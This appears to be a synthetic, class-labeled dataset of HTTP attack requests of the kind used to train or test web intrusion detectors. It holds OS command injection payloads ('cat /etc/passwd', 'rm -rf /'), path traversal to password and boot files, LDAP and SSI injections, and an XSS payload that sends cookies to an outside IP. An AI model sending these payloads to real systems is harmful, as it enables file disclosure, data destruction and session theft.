Range: -38,162-85,-031
Referer: http://www.lomoiko.gov/gibwea1/oTdiiu/Uwsiehd/h3ytg/trcde.nsf
TE: trailers,trailers,trailers
Trailer: Range
User-Agent: aecc1tsci (3CU27H.G7P; im946@7Wz; eHZlgCiW; rJG_z7N; oz0@y0)
UA-CPU: StrongARM
UA-Disp: 4216,933,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 3327x2128
Via: FTP/2.3 150.49.206.40, FTP/2.9 www.ytEoin.shtml
Transfer-Encoding: identity
Upgrade: zizt/1.0, Nfsr/7.3, araJv/5.9, 0athyr/9.5, 7a2ey/9.9
Warning: 083 51.53.107.61:3990 "ittpbttTz" "Fri, 23 May 08 24:15:13 GMT"
X-Forwarded-For: 246.53.246.66
X-Serial-Number: 9747150150274
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35650
Start - Id: 43615
class: OsCommanding
POST /ytteDnzr7eaeofT/B@/ezwynttenrtsi2zgy/al3HUfil3kyVOL/tUWq/nasrissdnninirecFn/agK27xRGWr-5V/4fmd/0Q/selectvVWgroup by_ahservices0aiIXwV.png? HTTP/1.1
Content-Length: 80
Content-Language: fachein,d7Cq,nuh
Content-Encoding: identity
Content-Location: /Elst/Hsgl/n0eni/jef4ti.swf
Content-MD5: aXJhc1NvYXlxcHN5aW5uaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 29 Jun 06 07:23:57 GMT
Last-Modified: Mon, 16 Feb 04 15:43:57 CET
Host: www.s3TcmrhhiN.biz:80
Connection: urte1sN
Accept: */*
Accept-Charset: macintosh;q=0.7, iso-8859-1
Accept-Encoding: *
Accept-Language: 7-o;q=0.7, srah-i1ewtll, secih-aaa, Ci-s;q=0.4, 5rn-ibta
Cache-Control: only-if-cached
Client-ip: 112.171.189.97
Cookie: lof7drrn=89656895
Cookie2: $Version="5"
Date: Fri, 15 Jan 10 16:20:08 GMT
ETag: W/"xa95_w0Wlj3Xi2ojD"
Expect: sii0tlh=i1nei1yi;qiyd3=hitetaby
From: ihse@2d96a.de
If-Modified-Since: Fri, 05 Sep 08 08:33:01 GMT
If-Unmodified-Since: Wed, 17 Jun 09 19:57:34 CET
If-Match: "sGyF-_bKIPkXf1C"
If-None-Match: "hr4uYUZeP7ZbM_7"
If-Range: Mon, 28 Sep 09 08:29:47 UTC
Max-Forwards: 6
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: NTLM YW9pNTJZMWxvYTFhZWFpZWRtZUVzaHRob0VlOHJHbjR0ZjJNY29lZHRhYWFibA==
Authorization: NTLM bWw2aGRzY1NhbGx1cDNvaWNhbmp0b21ubnNzaXJJZW9hbQ==
Range: 559-01519,-1,07-
Referer: /meuu/toww/htaaa/aiakaoec/rvsnwsr.asmx
TE: chunked;q=0.6
User-Agent: |cat   /etc/passwd    |
UA-CPU: x86
UA-Disp: 2173,331,32
UA-Pixels: 6552x5468
Via: 2.8 www.wo8oeCds.jpeg, 2.7 www.pseigaal.jpg:8431
Transfer-Encoding: r2erw
Upgrade: ztui/9.8, e5en/4.5, osoee/7.9, inhqa/2.0, 7Mlsb/6.6
Warning: 118 www.cbb2T.png "i0aItsig9elatumo9" 
X-Forwarded-For: 1.73.97.53
X-Serial-Number: 1018067
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

7yifyt=8&zI70=63079867&pnsot1prsjtIaI=anrIyoi7n&timqsIse=f&sEcnabeeOlag2ar=24519

End - Id: 43615
Start - Id: 47885
class: XSS
GET /46sIE-ZwUn/rddlf/CqkR4cat.mdb?umprd4aidftes=%5B%5CxC0%5D%5B%5CxBC%5Dscript%3E%5Balert+++%28%27jlyn6fisde%27%29%3B%5D%5B%5CxC0%5D%5B%5CxBC%5D%2Fscript+%3E HTTP/1.1
Host: www.yhwde4eicz.de
Connection: close
Accept: image/*;q=0.7
Accept-Charset: iso-8859-2;q=0.0
Accept-Encoding: identity;q=0.4, gzip;q=0.3
Accept-Language: f-3re, ywmcp67-rh4hr, lgfcapr-he, ra-di;q=0.1, 97-aDtrnwij;q=0.5
Cache-Control: only-if-cached
Client-ip: 109.167.174.90
Cookie: e6eiez8=lboStnnuiconnecttisu;t2iraeatbcaebat=e06OE-e1nX;cvd=lg$n3;tahentatdhydnr5=jmute
Cookie2: $Version="5"
Date: Sat, 01 Oct 05 03:34:22 UTC
ETag: "qBh8qCLVnhIo6nfJpx6"
Expect: InAnpD
From: clrwp@noorqoy.ch
If-Modified-Since: Fri, 09 Jun 06 19:55:20 GMT
If-Unmodified-Since: Sat, 05 Feb 05 22:12:16 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 25 Jan 09 13:57:37 CET
Max-Forwards: 7641
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: NTLM dHJzNWVuaHdBYUY2aHN0aGRldG9sZndobWV0czJsRWdoYWk1ZWc=
Authorization: Digest algorithm=sa5s7ath
Range: 064-,-6198,422476-
Referer: /rennc.rar
TE: trailers,trailers,trailers
Trailer: If-Range
User-Agent: 7oneE4gQsizSnii4c
UA-CPU: StrongARM
UA-Disp: 213,2027,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 084x9415
Via: 5.2 238.141.45.126, 2.3 182.78.149.95, 2.4 216.7.36.205:57
Transfer-Encoding: compress
Upgrade: ouunlj/9.5, swaiz/2.9
Warning: 467 236.48.115.46:4 "dhenjbbwtagatsai" "Wed, 29 Mar 06 13:58:45 UTC"
X-Forwarded-For: 129.38.22.254
X-Serial-Number: 8754080340538
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47885
Start - Id: 46816
class: XSS
POST /h3ssst/ioht33cNXta.html? HTTP/1.0
Content-Length: 279
Content-Language: unysurop,igo
Content-Encoding: deflate
Content-Location: /pRtscea/oz8iesze.gz
Content-MD5: b2huYXFiMXp0bHRoMGlsZw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 12 Jun 08 09:41:20 UTC
Last-Modified: Sun, 31 Jul 05 12:28:43 UTC
Host: www.fslamuyS.fr:61
Connection: close
Accept: image/png;q=0.7
Accept-Charset: iso-8859-1, x-mac-cyrillic;q=0.5, iso-2022-kr;q=0.5
Accept-Encoding: gzip, gzip, gzip, deflate;q=0.8
Accept-Language: *
Cache-Control: max-stale=3655
Client-ip: 180.151.251.196
Cookie: unf2aluhntotlf=163;zmyrraAq=76
Cookie2: $Version="70"
Date: Mon, 10 Jul 06 07:48:33 GMT
ETag: W/"clqO4HlZF-77um5s4W"
Expect: taanns
From: wdvoio@iotd9eelwd.de
If-Modified-Since: Sat, 29 Sep 07 19:10:27 UTC
If-Unmodified-Since: Sun, 14 May 06 11:14:27 UTC
If-Match: "UX8X8CcOtW5iCLhIO2"
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="dGncrnt"
Authorization: NTLM ZXJkRWV0MmJod0Jmcm9pc3JzMUZuMWg1c2VsMm5mZWh4ZWFvdnU=
Range: 175390-78,55-,908690-
Referer: http://ortetjI.uk/5Oe7uet/tadudl8E/usi3/mHnh.php
TE: trailers,gzip;q=0.3,trailers
Trailer: Referer
User-Agent: Mozilla/4.4 (Machintosh; U; PPC Mac OS X 6.2; ef-ej; rv:8.0.5) Gecko/95385632
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 818x5674
Via: Rxqa3/5.6 www.1aoe.png, 2.3 85.210.165.210, exqitq/8.5 www.vndr3arh.tiff
Transfer-Encoding: identity
Upgrade: haroE/4.5, c7ae2/5.1
Warning: 793 241.179.195.131 "halAIevnm" "Wed, 27 Apr 05 17:07:05 CET"
X-Forwarded-For: 90.185.191.90
X-Serial-Number: 80684101
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tfqrtdt2aoi=<div  style   = "     width:     expression([window.open('http://60.78.182.89/na.mdb'+document.cookie);]);     " >&gtf4ioornerNE=5228905016&ejonefelylmSy=mkr@&ro3ye3=7&0te1lhuf=6r&Obgdsoh=1&documenttQP5ugroup byaQiXZ=197793

End - Id: 46816
Start - Id: 43282
class: OsCommanding
GET /nemntanoseivdd/kileiepghsahph/fpnKQZiod.swf?dl=unhu7ymrzl1eee0d8&ewlstdins-tzV-=7083632&hUWXbKQ0p8X=rry7k9jaTs&dtsft=%3D&epsgt3e9rtoTr=nyui%292+%7ENtyeo%5B&ls6r7muys=sBbLgi&winnt7ua.Uwqcm=u9&6oxtseladaiome=gGmme&mahupRfui=%5Cnls++++%2Froot%2F HTTP/1.0
Host: 212.100.252.152
Connection: h01ahgdf
Accept: */*;q=0.1
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: ng=ico95H
Client-ip: 86.210.157.25
Cookie: etrC=932359268;xroed=429;ge1o=7eo?likefNshtpassoe g
Cookie2: $Version="414"
Date: Sat, 10 Oct 09 10:02:22 UTC
ETag: W/"9LxvEG1xl9f1meqjQ5m"
Expect: b1t3F5ik=ccEnhleR;tysne=masht6
From: fztees@dntsngao.be
If-Modified-Since: Sun, 15 Jun 08 02:35:55 UTC
If-Unmodified-Since: Sat, 27 Jun 09 08:50:03 GMT
If-Match: "LlYqESggmMdvozlOuT"
If-None-Match: *
If-Range: Mon, 20 Sep 04 03:49:49 GMT
Max-Forwards: 92
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: mVat alaCi5eC=cfwd
Range: -8678
Referer: /cdmb6/sikinhrm/opela0/Tshlo/hhy5.php
TE: chunked
Trailer: If-None-Match
User-Agent: umee/1.3.0.1.4
UA-CPU: PowerPC
UA-Disp: 5548,243,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 3321x719
Via: FTP/0.2 101.232.26.216
Transfer-Encoding: identity
Upgrade: apais/4.0
Warning: 824 77.211.235.51 "cihtsshy" "Wed, 01 Mar 06 07:42:35 UTC"
X-Forwarded-For: 160.47.213.152
X-Serial-Number: 9975739043069
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 43282
Start - Id: 43388
class: OsCommanding
GET /slipiud/kQ9b/niPZVs-3gYebaF33b1CE/teml1y9uTm/syngL5/mfls.tiff?aycovcy=%60+rm++-rf++++%2F+%60 HTTP/1.1
Host: www.ojnnahc.it:492
Connection: dtnOy
Accept: image/*, video/*;q=0.2
Accept-Charset: *
Accept-Encoding: compress;q=0.8, compress, deflate;q=0.3, identity;q=0.8
Accept-Language: vrhrnuwe-e
Cache-Control: min-fresh=5
Client-ip: 218.45.110.121
Cookie: @B1OFPmeHDH=2;coA4sEtfnsorlr=itnmetant(<;witqb
Cookie2: $Version="6"
Date: Tue, 06 Sep 05 22:28:35 CET
ETag: "IO-Ofwsum0Av3WPT"
Expect: 100-continue
From: no4b@rasantepan.ch
If-Modified-Since: Thu, 18 Dec 08 11:50:24 UTC
If-Unmodified-Since: Tue, 16 Mar 10 03:51:34 GMT
If-Match: "pPp3B_451yr-xkCP3NZ"
If-None-Match: *
If-Range: *
Max-Forwards: 80
MIME-Version: 1.8
Pragma: lv0e='6dil'
Proxy-Authorization: Digest realm
Authorization: Basic dGJ2ZXJuajp0c3RvbTVj
Range: 6605-,-56,5118-
Referer: /ySiiie/TNarrt/tAnue8/2rttehzw.bin
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/7.5 (Windows; U; WinNT 9.9; rt-th; rv:8.6.5) Gecko/33420710
UA-CPU: PowerPC
UA-Disp: 400,542,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 9788x122
Via: 5.9 161.28.182.43
Transfer-Encoding: identity
Upgrade: asl/7.8, ni0se/0.8, eramny/7.3, oiHet/2.2
Warning: 760 153.140.23.116 "tasreEom4" "Mon, 12 Apr 10 01:21:27 GMT"
X-Forwarded-For: 207.33.218.68
X-Serial-Number: 68319129
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43388
Start - Id: 45513
class: PathTransversal
GET /eT3n/o7yn/lVOj/amLpldhetinSysenb/5Raed/xD1oKNn3jHX7o/6LaT_0wFAa1X.jpeg?n3l2=5430&ohdhhiEsiG=e%3A%5Cwindows%5Cboot.ini HTTP/1.0
Host: www.6need.cz
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.3
Accept-Encoding: compress;q=0.9, gzip;q=0.7, identity;q=0.5, compress
Accept-Language: *
Cache-Control: no-cache
Client-ip: 223.213.31.209
Cookie: pnd0lOhacesgh=0KvI;uno9sE10hnin=if pIeqanly];irketaoguett=rtrcoABGtnrpu8Nure;objectinE-1z=&;mm=L=bp'[-9;RRm_9=e lob
Cookie2: $Version="77"
Date: Sat, 12 Jan 08 08:41:42 GMT
ETag: "HCkSEP_Kj70TdQ5Q5"
Expect: altDi
From: deeIete@oniiixeM.de
If-Modified-Since: Sun, 21 Sep 08 19:09:19 GMT
If-Unmodified-Since: Fri, 28 May 04 23:06:11 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1120
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: Basic Q240c1A6bHNqZGRuZ3g=
Authorization: Digest qop=auth
Range: 55569-482846
Referer: /Gdsl/2ers.nsf
TE: deflate
Trailer: Accept
User-Agent: Mozilla/6.1 (compatible; Konqueror/5.3; Windows NT; gotaottc; eoeeqflhRo; tnntrd)
UA-CPU: x86
UA-Disp: 9630,820,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2096x915
Via: 4.5 www.irtI.tiff, HTTP/3.5 www.aaeh.tiff, aasipd/2.5 91.117.89.130:501
Transfer-Encoding: identity
Upgrade: paa/8.6, yprO/1.1
Warning: 336 www.pkli.gif "eE8hyyveresaci5o6et" 
X-Forwarded-For: 59.230.132.58
X-Serial-Number: 8223453
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45513
Start - Id: 46209
class: PathTransversal
GET /eAOtenps/Dem2e/Aaccess_logtE0dyDCg56FQy/nj@mL1/gcat2t3YPnRjadmin/0UEONX@BjF2AQhv/znpksahsaorirnFae.mspx?cLya=080016&bgsound55nvs7S0tuV=hwI_Wa&fiwvxAkewe=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&sk=92985&b9ahqMUKtUP=eiLfZzEX%40k%40&ykes3Sei2ee=Jie+%24d%29&hhnfauom=lE HTTP/1.0
Host: 179.51.197.199
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=6156
Client-ip: 163.45.207.111
Cookie: nSvuayEeloeiobT=4spametame9d gcoh;ktey0anaan=rxE24RapYXUO;rmsts9eai=sstt;ZEQZt=rO@0IK
Cookie2: $Version="669"
Date: Thu, 10 Jul 08 05:03:02 UTC
ETag: W/"BwoAIQ_gJnkwh@ELCI"
Expect: 100-continue
From: meamrne@llueIt.be
If-Modified-Since: Tue, 29 Mar 05 09:02:56 UTC
If-Unmodified-Since: Wed, 08 Apr 09 19:57:27 UTC
If-Match: *
If-None-Match: "F7XPwDF14kCI7ZklMa"
If-Range: Thu, 21 Apr 05 14:14:02 GMT
Max-Forwards: 79
MIME-Version: 5.5
Pragma: i1so4=1wEytna
Proxy-Authorization: Basic YWNlaTp0dVJlYw==
Authorization: Digest algorithm=MD5-sess
Range: 684-,-674552,060-
Referer: http://www.c1nplnae.net/cdrj0osl/qetNeit/eelenae.css
TE: deflate,deflate;q=0.3
Trailer: Date
User-Agent: Mozilla/5.2 (compatible; Konqueror/3.5; Open BSD i586; pact; kfceH; radetoy)
UA-CPU: x86
UA-Disp: 411,052,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 6581x3968
Via: 2.1 116.74.196.79, FTP/1.8 www.dohs.htm, daeltE/2.5 www.tcepsiiq.css
Transfer-Encoding: reauo; w1wRcde=ltxq6e
Upgrade: peg/8.7, taas/9.0, SiHads/8.8, ne61as/9.8
Warning: 016 www.OneEt2b.png "1o25atoylheiie" "Thu, 23 Aug 07 12:50:16 GMT"
X-Forwarded-For: 249.22.33.20
X-Serial-Number: 03479803459
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46209
Start - Id: 38849
class: LdapInjection
GET /hee3eaEc/dCeRd/MYnc9@/pBbiQcaRuyeude/ypT2d16/Gprocessing-instructionYAdocumentBszc/oil/aowSaioeswmp.png?atsr=37201089&p1ca=ybgi%25hncnlauj&nisaalhtie=b79NYmQPxQ&rortd=usystemEi%40tae7a&vcGJ=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&oo0aelnvtemryoo=gd&ihd7es=34371719&tig5coo3d=nt-unT8zRXh&Rlanefel3engw=rC8VPxx HTTP/1.0
Host: 212.171.205.15
Connection: sksam
Accept: video/quicktime, application/*
Accept-Charset: *
Accept-Encoding: gzip, gzip, compress, compress;q=0.1, deflate;q=0.8
Accept-Language: eba-rtop
Cache-Control: max-age=56
Client-ip: 149.133.119.108
Cookie: lseeyuiiwtptim=iri:sMns;HdGW1Sd=8072;w6dorennRn=sSvnifihlltii;eitYateccnWe=Ntvtcqelvns4i
Cookie2: $Version="36"
Date: Thu, 10 Jan 08 21:59:20 UTC
ETag: W/"q@gwKxzEx8Iq1.Wec@y"
Expect: beeepata=O503do;rmagetie
From: heIinnsa@oahcE7tm6m.cz
If-Modified-Since: Sun, 02 Jan 05 14:48:27 UTC
If-Unmodified-Since: Tue, 14 Apr 09 11:48:35 CET
If-Match: "A9HmJ9nfB4HDx6x"
If-None-Match: "@nXv3OGmTIP_@ISF56U"
If-Range: Tue, 25 Apr 06 21:32:26 UTC
Max-Forwards: 199
MIME-Version: 3.5
Pragma: huo='hjr'
Proxy-Authorization: Digest nonce
Authorization: Basic enN1MDdwdW86c3NoZW1pYQ==
Range: -390702,-162,16550-
Referer: /ikanshr/ydsi/nqgngT.zip
TE: trailers
Trailer: Via
User-Agent: Mozilla/5.3 (compatible; MSIE 3.5; Open BSD i386; pegtha)
UA-CPU: 68000
UA-Disp: 1599,031,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 072x4241
Via: 3.2 128.222.169.209
Transfer-Encoding: identity
Upgrade: O88/7.9, ieosN/1.3, eTtno/0.5, aah/4.6
Warning: 313 www.NteEt.png "Pcgrneh6n" "Fri, 24 Jul 09 11:00:14 GMT"
X-Forwarded-For: 145.148.155.9
X-Serial-Number: 74857144808284221
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 38849
Start - Id: 37309
class: LdapInjection
GET /iTE1xRL0JeeneI.php?2s=87427&slrol=e7ecotnthtcnph-1qfrom&5Ara5ehaPssfsyi=eetopt&ldd4eaun=enX&as2opHu=cmdnth&0afdeycqawemhen=4&DSZ_styleVSoQ=20614&lmI.VH7=h8R%3Da&z9K9tmpEf4P=sih6i5aqTOerc&ibqelud=ss&lurIdg=ltogtmatmoi+as&tpssrleuwqsqb=cDQdRw&a1elfrtO9pz=hR38_IuZv HTTP/1.1
Host: 174.72.246.97
Connection: keep-alive
Accept: audio/*;q=0.3, image/*;q=0.7
Accept-Charset: x-mac-turkish;q=0.2
Accept-Encoding: deflate;q=0.1, gzip;q=0.4, deflate, deflate, compress;q=0.3
Accept-Language: )   (|   (gtm=wtES*)
Cache-Control: no-store
Client-ip: 181.208.243.92
Cookie: tbszcjInakr=866071;aeecxnIr3eosa=98299;Ssasac=f7vhocE7hA1o;uow=eHiU;G0l-w60vzM3=d?itl;os;aooktdthrapc8==Dps2eidw
Cookie2: $Version="1"
Date: Thu, 29 Dec 05 18:02:30 UTC
ETag: W/"ui4lzoibifGmtndekwR"
Expect: shi8=dlun;mntfmtq
From: sorzn@iDilimhi.net
If-Modified-Since: Thu, 03 Mar 05 02:52:08 GMT
If-Unmodified-Since: Tue, 09 Mar 10 01:14:17 GMT
If-Match: "Gu6bC_-sMpHMipQP"
If-None-Match: "tX@zM-ahcTpZHss"
If-Range: "akChn99eOT_O09v_"
Max-Forwards: 8156
MIME-Version: 4.4
Pragma: Oheth289='fo5endF'
Authorization: Basic YWRzbnluOnRzbnRlYg==
Range: 503-,832-,6986-99
Referer: http://ej0s.biz/nysea/gqntoer/aitgni/ssnt/lpiu.mdb
TE: trailers
Trailer: If-Range
User-Agent: ulmhrt
UA-CPU: Sparc
UA-Disp: 6088,0787,32
UA-Color: color16
Via: vmese/5.7 www.gSroereO.shtml, sxbocr/5.6 23.40.135.172
Transfer-Encoding: gzip
Upgrade: me0rtS/2.5, meFrup/7.5
Warning: 988 www.Panx.gif "uhhf" "Wed, 07 Mar 07 21:03:39 UTC"
X-Forwarded-For: 97.235.140.149
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37309
Start - Id: 39941
class: SSI
POST /nSS35dlAgT7A3/oqJ/h5gveX3mureilnniaIEj.pl? HTTP/1.1
Content-Length: 112
Content-Language: bffmtsyl,tlesyeet
Content-Encoding: identity
Content-Location: http://www.06dtnci.com/g5llrqe/hidnj.asmx
Content-MD5: aHp6bmllbHJ1NmVkMGM0RQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 07 Sep 09 12:45:07 UTC
Last-Modified: Fri, 04 Nov 05 03:07:56 CET
Host: www.cexrr0.cz
Connection: mhonniha
Accept: image/gif;q=0.7
Accept-Charset: cp-932;q=0.1
Accept-Encoding: gzip, gzip, deflate
Accept-Language: *
Cache-Control: adoykihh='tciudc'
Cookie: Lae7i1pcs4Shib=rh8i;Hzvnltc=cmdehrb;EDselectq@qC8=t7cK
Date: Tue, 08 Jun 04 17:15:40 CET
Expect: acstne=Sh1yt
If-Modified-Since: Fri, 15 Feb 08 17:31:02 CET
If-Unmodified-Since: Tue, 08 Aug 06 04:06:02 CET
If-Match: *
If-None-Match: "jbFnPUIQs@Tr7oW"
Max-Forwards: 537
MIME-Version: 0.5
Proxy-Authorization: NTLM MnQ0N3d2bnRjbTF3dGQzdEFha2l0bjlybHhocGxhaGVlbnRsbjhhclI=
Authorization: Digest opaque="drBm"
Range: 8339-3904
Referer: /eo7nIth6/nnHina/hqem/weanMbr.gz
TE: trailers
Trailer: From
User-Agent: s-F6J0WY http://www.2eixo.gov
UA-Pixels: 3924x987
Via: 7.1 251.95.169.24, HTTP/1.7 254.249.237.24
Transfer-Encoding: deflate
Upgrade: AWutq/3.3, Ereghm/5.5, aashd/6.2, ypndU4/8.9, Egoa/7.9
X-Serial-Number: 029145604

NRwefao=97225&ebUha=<!--     #exec   cmd="/bin/ls   -l  /home/tohd0c5/wNumtIemn"     -->

End - Id: 39941
Start - Id: 38167
class: LdapInjection
GET /e68i2arsaf/u9XE/tuCtwain7ehOeqts.php?OdgteHbsoy=vzuvH4ftpvtrCyo50&.amtjDJR=1323%29%28%26%28objectClass%3Dkal%29%28%7C%28sn+++%3D+jc%29%28cn%3Dddra+++++J*%29%29&97d7ilrqUaise=Imh8s&s6ih0n=mmuXdS&Wywrsof=%5Dt2%3C&1A7joWj=6ia+e%40%7CaeTn-hqhi HTTP/1.0
Host: www.nmoluLxf4.de
Connection: close
Accept: video/quicktime, application/postscript;q=0.3, application/rtf;q=0.4
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 122.205.56.130
Cookie: 5sisi=ehb0;anxntirNuoh=3961008128;5-ycosaccess_logG1T4=rq r~;AcLztn1aghhgpde=mnheanwYnehYutw;hhdy6te=sz0@J3FXlju3;Ttn=rmornrmo
Cookie2: $Version="5"
Date: Fri, 28 Jul 06 09:43:26 GMT
ETag: W/"I4g._rkzJPtJSclIRTr"
Expect: itgdtcl=icezz
From: b63ter3o@6adqse.net
If-Modified-Since: Fri, 09 Nov 07 06:09:34 GMT
If-Unmodified-Since: Tue, 16 May 06 10:59:16 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 03 Apr 07 05:00:35 GMT
Max-Forwards: 0410
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: vanc 8esln=eenorc9
Authorization: Digest response="FccE9222AAefC7fBdF4E41fc40E562cd"
Range: -58269,-622
Referer: /1lstI/meP5/emEiawqt.rar
TE: deflate
Trailer: Proxy-Authorization
User-Agent: ts@L0XOb7 http://www.sisttiot.cz
UA-CPU: PowerPC
UA-Disp: 840,6467,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 550x1014
Via: 5.8 17.83.235.142, 3.2 117.87.41.173, FTP/1.8 174.112.172.23
Transfer-Encoding: sctr
Upgrade: nume/0.6, Uma/7.3
Warning: 607 www.RgHm.tiff "solih9ny" 
X-Forwarded-For: 105.91.132.113
X-Serial-Number: 276586158043
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 38167
Start - Id: 37273
class: LdapInjection
PUT /ozPhu/qJgmDwH8GluW3pnpByv/7iFU@yxopen/v7a-BH/s2ruxeejiriu.htm? HTTP/1.1
Content-Length: 86
Content-Language: yc,8rp
Content-Encoding: deflate
Content-Location: /hnvei/yrll.cfm
Content-MD5: c2F0bUVoYW91VHNoaG45Zg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 23 Oct 08 20:43:20 CET
Last-Modified: Thu, 18 Oct 07 14:04:19 CET
Host: 169.255.195.26
Connection: insnb
Accept: image/*, audio/x-wav;q=0.8
Accept-Charset: iso-2022-jp
Accept-Encoding: gzip, deflate, identity
Accept-Language: xtao-sEn8, uea9f-uh8lb;q=0.2, o-dwo;q=0.3
Cache-Control: no-cache
Client-ip: 110.248.121.211
Cookie: hki2TOhAhr=D\copy;kXg3gWJeHLXX=6180691;teaehamstlharv=Nexec<nn]h3ar winntwmail
Cookie2: $Version="0"
Date: Mon, 23 Jan 06 11:11:35 UTC
Expect: uecft0
If-Modified-Since: Fri, 26 Mar 10 19:37:28 UTC
If-Unmodified-Since: Tue, 15 Jul 08 21:44:45 GMT
If-None-Match: "gLKmackkBNKxyzK3"
If-Range: Wed, 21 May 08 09:23:11 UTC
Max-Forwards: 196
MIME-Version: 5.1
Pragma: Amribh10='htsiyeo'
Proxy-Authorization: NTLM bjlyaTdodGlzZTV1ZWxOdHJ1ZDZ4dTRucjM2bnNpd2xnb3RWZWVyZ21hbnQx
Authorization: NTLM OHNzYW83ZWVMeGlkbzNpbzdlanR0T2x5ZWVMbmxoZXI=
Range: -3,40874-059856,-5
Referer: http://www.apts.st/rzHIrhT.pl
Trailer: TE
User-Agent: gfb6s)(&(objectClass    =Tc*)
UA-Color: color32
Via: FTP/5.0 216.60.151.133, FTP/3.3 www.lnuetg.jpeg
Transfer-Encoding: deflate
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

oe0mzIkeehe=xxm8O74y&d0vTLbxNAK=431388771&hnQQzfupdate8EZL=dt@ubnOdsn@&polsb=Ios5e

End - Id: 37273
Start - Id: 43047
class: OsCommanding
POST /uS6goL4bTkewkOdeyS/e2/annS/aB736s6/haGOPOLFc9j/iLJVpvrn2JHDh@/d2JVFBsO--y8/SonohhrvEoSr0bsrT1c.bin? HTTP/1.1
Content-Length: 283
Content-Language: 6O3vA
Content-Encoding: compress
Content-Location: http://www.4ltJi3.be/r3rt/cel1st/TSrd/uoanhN.pl
Content-MD5: NWlzZXBTaTBqMHRhdG9IbA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 17 May 04 24:22:14 CET
Last-Modified: Fri, 13 Aug 04 05:26:04 CET
Host: www.OAig.gov
Connection: close
Accept: video/*, text/plain
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 241.8.137.249
Cookie: eCRcQV7=qWieoD7hdlsdcugTk;oniuy=etrq2tcIs;teN=6dlraow;asb=eoose7okaehvh6
Cookie2: $Version="392"
Date: Tue, 12 Dec 06 14:48:01 GMT
ETag: W/"dr6TJdlM6CLJAqWeGdZ"
Expect: 100-continue
From: mreeste@aqoethavtE.gov
If-Modified-Since: Sun, 16 Aug 09 21:58:26 CET
If-Unmodified-Since: Tue, 24 Jul 07 10:47:29 GMT
If-Match: "ukksdffcFGArsFE5e4Jf"
If-None-Match: "9ZeuzdNhr24f44h"
If-Range: *
Max-Forwards: 85
MIME-Version: 1.6
Pragma: 17BRynI=sEn8ex
Proxy-Authorization: titoh aivw=aonsbe
Authorization: Digest algorithm=p6ieY9
Range: -18591
Referer: http://www.qnnil.st/p0tatg.msf
TE: trailers,trailers,gzip
Trailer: From
User-Agent: oCKxs4M http://www.spb70.uk
UA-CPU: Sparc
UA-Disp: 575,612,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2695x320
Via: 2.8 www.hdehw.tiff
Transfer-Encoding: gzip
Upgrade: 6eo/8.6, xnieO/5.1, ontIn/6.5, lyi/1.7, atafbe/1.2
Warning: 949 www.umlpttl.html:72 "q3sco" "Sat, 17 Jul 04 20:43:31 GMT"
X-Forwarded-For: 121.83.206.9
X-Serial-Number: 4857297063808
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

